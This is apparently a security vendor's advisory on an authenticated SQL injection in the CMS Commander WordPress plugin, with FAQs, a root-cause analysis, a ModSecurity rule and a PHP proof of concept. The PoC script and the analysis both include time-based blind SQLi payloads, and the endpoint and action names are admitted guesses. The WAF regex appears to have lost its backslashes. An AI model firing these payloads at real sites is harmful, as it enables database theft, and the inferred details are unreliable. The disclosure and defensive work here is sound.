What is CVE-2026-3334?

CVE-2026-3334 is a high-severity SQL injection vulnerability found in the CMS Commander plugin for WordPress. It allows authenticated users with a valid CMS Commander API key to manipulate SQL queries through specific parameters, potentially leading to unauthorized data access.

How does the SQL injection work?

The vulnerability arises from insufficient escaping of user-supplied input in SQL queries. Attackers can inject malicious SQL code through the ‘or_blogname’, ‘or_blogdescription’, and ‘or_admin_email’ parameters during the plugin’s restore workflow, allowing them to execute arbitrary SQL commands.

Who is affected by this vulnerability?

Any WordPress site using CMS Commander plugin version 2.288 or earlier is affected. Administrators should verify their plugin version and check if they have the CMS Commander API key, as only authenticated users can exploit this vulnerability.

How can I check if my site is vulnerable?

To check for vulnerability, confirm that your CMS Commander plugin is version 2.288 or earlier. Additionally, review your site’s usage of the plugin and ensure that authenticated users with API keys are not able to execute unauthorized SQL commands.

What should I do to fix this vulnerability?

To mitigate this vulnerability, update the CMS Commander plugin to the latest version where the issue is resolved. Additionally, ensure that all SQL queries using user input are properly prepared using WordPress’s $wpdb->prepare() method to prevent SQL injection.

What does the CVSS score of 8.8 indicate?

A CVSS score of 8.8 indicates a high severity risk, meaning that successful exploitation can lead to significant impacts on the confidentiality, integrity, and availability of the affected system. Administrators should prioritize addressing this vulnerability.

What impact can this vulnerability have?

Exploitation of this vulnerability can lead to attackers extracting sensitive information from the database, including user credentials and API keys. It may also allow attackers to modify database contents, potentially leading to privilege escalation or full site compromise.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can use a crafted payload to exploit the SQL injection vulnerability. It shows how to send a request to the vulnerable endpoint with an API key and a malicious payload that can manipulate SQL query execution.

How can I protect my site from SQL injection attacks?

To protect against SQL injection attacks, always validate and sanitize user inputs, use prepared statements for SQL queries, and keep all plugins and themes updated. Regular security audits and monitoring can also help identify and mitigate potential vulnerabilities.

Are there any additional resources for understanding SQL injection?

Yes, various resources are available for learning about SQL injection, including OWASP’s SQL Injection Prevention Cheat Sheet and security training materials. Familiarizing yourself with secure coding practices can also help prevent such vulnerabilities.

What should I do if I suspect my site has been compromised?

If you suspect that your site has been compromised, immediately change all API keys and passwords, review access logs for suspicious activity, and consider restoring from a clean backup. It is also advisable to conduct a full security audit.

Can this vulnerability be exploited remotely?

No, this vulnerability requires authentication via a valid CMS Commander API key, which limits the attack surface to authenticated users. However, if an attacker gains access to a valid API key, they can exploit the vulnerability remotely.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 25, 2026

CVE-2026-3334: CMS Commander <= 2.288 – Authenticated (Custom+) SQL Injection via 'or_blogname' Parameter (cms-commander-client)

CVE ID CVE-2026-3334

Plugin cms-commander-client

Severity High (CVSS 8.8)

CWE 89

Vulnerable Version 2.288

Patched Version —

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3334 (metadata-based):
This vulnerability is an authenticated SQL injection in the CMS Commander WordPress plugin. Attackers with access to a valid CMS Commander API key can inject malicious SQL commands through the ‘or_blogname’, ‘or_blogdescription’, and ‘or_admin_email’ parameters during the plugin’s restore workflow. The CVSS score of 8.8 reflects a high-severity risk to confidentiality, integrity, and availability.

Atomic Edge research infers the root cause is improper neutralization of user-supplied input within SQL commands (CWE-89). The description states insufficient escaping and lack of query preparation. Without a code diff, this indicates the plugin likely concatenated user-controlled parameters directly into SQL statements. The vulnerable parameters appear to be part of a conditional WHERE clause, as suggested by the ‘or_’ prefix. This is a classic SQL injection pattern where user input modifies query logic.

The attack vector requires authentication via a valid CMS Commander API key. The vulnerability description references the ‘restore workflow’. Atomic Edge analysis deduces this workflow is likely triggered via a WordPress AJAX handler or a custom admin endpoint. A probable endpoint is /wp-admin/admin-ajax.php with an action parameter like ‘cms_commander_restore’ or similar. Attackers would send a POST request containing their API key and a malicious payload in one of the named parameters, such as ‘or_blogname’. A payload might be: ‘ OR 1=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)–‘ to perform time-based blind SQL injection.

Effective remediation requires using WordPress’s $wpdb->prepare() method for all SQL queries that incorporate user input. The plugin must ensure all variables in SQL statements are properly parameterized. Direct string concatenation with user-controlled data must be eliminated. Input validation alone is insufficient for SQL injection prevention in WordPress; prepared statements are the standard.

Successful exploitation allows attackers to extract sensitive information from the database. This includes hashed user passwords, API keys, and other plugin-specific secrets stored in wp_options or custom tables. Attackers could also potentially modify database contents, leading to privilege escalation or site compromise. The authenticated nature limits the attack pool, but the impact is full database access for any user with the required API key.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3334 (metadata-based)
# This rule targets SQL injection via the CMS Commander plugin's restore workflow AJAX endpoint.
# It matches the specific vulnerable parameters described in the CVE.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20263334,phase:2,deny,status:403,chain,msg:'CVE-2026-3334: CMS Commander SQL Injection via AJAX',severity:'CRITICAL',tag:'CVE-2026-3334',tag:'WordPress',tag:'Plugin:CMS-Commander-Client',tag:'Attack/SQLi'"
  SecRule ARGS_POST:action "@rx ^(cms_commander|cmmscmd|cmc)" 
    "chain,t:none"
    SecRule ARGS_POST "@rx b(or_blogname|or_blogdescription|or_admin_email)b" 
      "chain,t:none"
      SecRule ARGS_POST:or_blogname|ARGS_POST:or_blogdescription|ARGS_POST:or_admin_email "@rx (?i)(b(select|union|sleep|benchmark|ifs*(|cases+when)b|['"]s*(and|or)s*[d('"]|(ds*[=<>]+s*d))" 
        "t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:removeWhitespace,capture"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3334 - CMS Commander <= 2.288 - Authenticated (Custom+) SQL Injection via 'or_blogname' Parameter
<?php
/*
Assumptions:
1. The vulnerable endpoint is a WordPress AJAX handler at /wp-admin/admin-ajax.php.
2. The AJAX action name is derived from the plugin slug ('cms-commander-client').
3. The exploit requires a valid 'api_key' parameter (the authentication mechanism).
4. The vulnerable parameters are 'or_blogname', 'or_blogdescription', and 'or_admin_email'.
5. The injection point is within a WHERE clause, allowing boolean-based or time-based blind SQLi.
*/

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';
$api_key = 'VALID_API_KEY_HERE'; // Attacker must possess a valid CMS Commander API key

// Time-based blind SQL injection payload targeting the 'or_blogname' parameter.
// This payload uses the SLEEP() function to cause a 5-second delay if injection succeeds.
$malicious_payload = "' OR IF(1=1,SLEEP(5),0) AND '1'='1";

$post_data = array(
    'action' => 'cms_commander_client_restore', // Inferred action name
    'api_key' => $api_key,
    'or_blogname' => $malicious_payload,
    // Other required parameters for the restore workflow may be needed.
    // 'or_blogdescription' and 'or_admin_email' are also vulnerable.
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 15); // Increase timeout to detect sleep

$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
$elapsed = $end_time - $start_time;
curl_close($ch);

if ($elapsed >= 5) {
    echo "[+] Potential SQL Injection successful. Response delayed by " . round($elapsed, 2) . " seconds.n";
    echo "Response snippet: " . substr($response, 0, 500) . "n";
} else {
    echo "[-] No time delay detected. Injection may have failed or site is not vulnerable.n";
    echo "Elapsed time: " . round($elapsed, 2) . " seconds.n";
}
?>

Frequently Asked Questions

What is CVE-2026-3334?
Overview of the vulnerability
CVE-2026-3334 is a high-severity SQL injection vulnerability found in the CMS Commander plugin for WordPress. It allows authenticated users with a valid CMS Commander API key to manipulate SQL queries through specific parameters, potentially leading to unauthorized data access.
How does the SQL injection work?
Mechanics of the attack
The vulnerability arises from insufficient escaping of user-supplied input in SQL queries. Attackers can inject malicious SQL code through the ‘or_blogname’, ‘or_blogdescription’, and ‘or_admin_email’ parameters during the plugin’s restore workflow, allowing them to execute arbitrary SQL commands.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using CMS Commander plugin version 2.288 or earlier is affected. Administrators should verify their plugin version and check if they have the CMS Commander API key, as only authenticated users can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, confirm that your CMS Commander plugin is version 2.288 or earlier. Additionally, review your site’s usage of the plugin and ensure that authenticated users with API keys are not able to execute unauthorized SQL commands.
What should I do to fix this vulnerability?
Remediation steps
To mitigate this vulnerability, update the CMS Commander plugin to the latest version where the issue is resolved. Additionally, ensure that all SQL queries using user input are properly prepared using WordPress’s $wpdb->prepare() method to prevent SQL injection.
What does the CVSS score of 8.8 indicate?
Understanding severity levels
A CVSS score of 8.8 indicates a high severity risk, meaning that successful exploitation can lead to significant impacts on the confidentiality, integrity, and availability of the affected system. Administrators should prioritize addressing this vulnerability.
What impact can this vulnerability have?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to attackers extracting sensitive information from the database, including user credentials and API keys. It may also allow attackers to modify database contents, potentially leading to privilege escalation or full site compromise.
What is the proof of concept for this vulnerability?
Demonstrating the SQL injection
The proof of concept demonstrates how an attacker can use a crafted payload to exploit the SQL injection vulnerability. It shows how to send a request to the vulnerable endpoint with an API key and a malicious payload that can manipulate SQL query execution.
How can I protect my site from SQL injection attacks?
Best practices for prevention
To protect against SQL injection attacks, always validate and sanitize user inputs, use prepared statements for SQL queries, and keep all plugins and themes updated. Regular security audits and monitoring can also help identify and mitigate potential vulnerabilities.
Are there any additional resources for understanding SQL injection?
Further reading and learning
Yes, various resources are available for learning about SQL injection, including OWASP’s SQL Injection Prevention Cheat Sheet and security training materials. Familiarizing yourself with secure coding practices can also help prevent such vulnerabilities.
What should I do if I suspect my site has been compromised?
Response to potential exploitation
If you suspect that your site has been compromised, immediately change all API keys and passwords, review access logs for suspicious activity, and consider restoring from a clean backup. It is also advisable to conduct a full security audit.
Can this vulnerability be exploited remotely?
Understanding the attack vector
No, this vulnerability requires authentication via a valid CMS Commander API key, which limits the attack surface to authenticated users. However, if an attacker gains access to a valid API key, they can exploit the vulnerability remotely.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations